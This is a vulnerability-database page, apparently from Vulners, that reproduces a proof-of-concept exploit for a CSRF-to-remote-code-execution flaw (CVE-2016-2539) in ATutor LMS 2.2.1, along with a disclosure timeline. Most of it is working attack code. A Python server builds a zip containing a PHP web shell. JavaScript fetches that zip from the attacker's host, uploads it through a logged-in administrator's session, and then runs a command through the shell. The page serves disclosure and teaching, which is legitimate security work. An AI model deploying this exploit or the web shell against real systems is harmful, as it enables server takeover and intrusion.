Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ATutor LMS 2.2.1 CSRF Remote Code Execution

🗓️ 07 Mar 2016 00:00:00Reported by mr_meType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 37 Views

ATutor LMS 2.2.1 CSRF Remote Code Execution vulnerability discovered and patche

Related
Code
`/* exp.js  
  
ATutor LMS <= 2.2.1 install_modules.php CSRF Remote Code Execution  
by mr_me  
  
Notes:  
``````  
- Discovered for @ipn_mx students advanced php vuln/dev class  
- Tested on the latest FireFox 44.0.2 release build  
- This poc simply uploads a zip file as pwn/si.php with a "<?php system($_GET['cmd']); ?>" in it  
- You will need to set the Access-Control-Allow-Origin header to allow the target to pull zips  
- Use this with your favorite XSS attack  
- Student proof, aka bullet proof  
  
Timeline:  
`````````  
23/02/2016 - notified vendor via info[at]atutor[dot]ca  
24/02/2016 - requested CVE and assigned CVE-2016-2539  
24/02/2016 - vendor replied stating they are investigating the issue  
05/03/2016 - vendor patches the issue (https://github.com/atutor/ATutor/commit/bfc6c80c6c217c5515172f3cc949e13dfa1a92ac)  
06/03/2016 - coordinated public release  
  
Example:   
````````  
mr_me@jupiter:~$ cat poc.py   
#!/usr/bin/python  
  
import sys  
import zipfile  
import BaseHTTPServer  
from cStringIO import StringIO  
from SimpleHTTPServer import SimpleHTTPRequestHandler  
  
if len(sys.argv) < 3:  
print "Usage: %s <lport> <target>" % sys.argv[0]  
print "eg: %s 8000 172.16.69.128" % sys.argv[0]  
sys.exit(1)  
  
def _build_zip():  
"""  
builds the zip file  
"""  
f = StringIO()  
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)  
z.writestr('pwn/si.php', "<?php system($_GET['cmd']); ?>")  
z.close()  
handle = open('pwn.zip','wb')  
handle.write(f.getvalue())  
handle.close  
  
class CORSRequestHandler (SimpleHTTPRequestHandler):  
def end_headers (self):  
self.send_header('Access-Control-Allow-Origin', 'http://%s' % sys.argv[2])  
SimpleHTTPRequestHandler.end_headers(self)  
  
if __name__ == '__main__':  
_build_zip()  
BaseHTTPServer.test(CORSRequestHandler, BaseHTTPServer.HTTPServer)  
  
mr_me@jupiter:~$ ./poc.py 8000 172.16.69.128  
Serving HTTP on 0.0.0.0 port 8000 ...  
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /exp.js HTTP/1.1" 200 -  
172.16.69.1 - - [23/Feb/2016 14:04:07] "GET /pwn.zip HTTP/1.1" 200 -  
  
~ de Mexico con amor,  
  
*/  
  
var get_hostname = function(href) {  
var l = document.createElement("a");  
l.href = href;  
return l.hostname + ":" + l.port;  
};  
  
function trolololol(url, file_data, filename) {  
var file_size = file_data.length,  
boundary = "828116593165207937691721278",  
xhr = new XMLHttpRequest();  
  
// latest ff doesnt have sendAsBinary(), so we redefine it  
if(!xhr.sendAsBinary){  
xhr.sendAsBinary = function(datastr) {  
function byteValue(x) {  
return x.charCodeAt(0) & 0xff;  
}  
var ords = Array.prototype.map.call(datastr, byteValue);  
var ui8a = new Uint8Array(ords);  
this.send(ui8a.buffer);  
}  
}  
  
// the callback after this stage is done...  
xhr.onreadystatechange = function() {  
if (xhr.readyState == XMLHttpRequest.DONE) {  
xhr = new XMLHttpRequest();  
// change this if you change the zip  
xhr.open("GET", "/ATutor/mods/pwn/si.php?cmd=id", true);  
xhr.send();  
}  
}  
  
xhr.open("POST", url, true);  
// simulate a file MIME POST request.  
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);  
xhr.setRequestHeader("Content-Length", file_size);  
var body = "--" + boundary + "\r\n";  
body += 'Content-Disposition: form-data; name="modulefile"; filename="' + filename + '"\r\n';  
body += "Content-Type: archive/zip\r\n\r\n";  
body += file_data + "\r\n";  
body += "--" + boundary + "\r\n";  
body += 'Content-Disposition: form-data; name="install_upload"\r\n\r\n';  
body += "junk\r\n";  
body += "--" + boundary;  
xhr.sendAsBinary(body);  
return true;  
}  
  
function pwn(){  
var xhr = new XMLHttpRequest();  
// et phone home  
var home = get_hostname(document.scripts[0].src);  
// get our own zip file  
xhr.open('GET', 'http://' + home + '/pwn.zip', true);  
xhr.responseType = 'blob';  
xhr.onload = function(e) {  
if (this.status == 200) {  
// use the FileReader class to get the raw binary  
var reader = new window.FileReader();  
reader.readAsBinaryString(new Blob([this.response], {type: 'application/zip'}));   
reader.onloadend = function() {  
trolololol("/ATutor/mods/_core/modules/install_modules.php", reader.result, "pwn.zip");  
}  
}  
};  
xhr.send();  
}  
  
pwn();  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00082
atutor lmscsrfremote code executionvulnerabilitypatched
37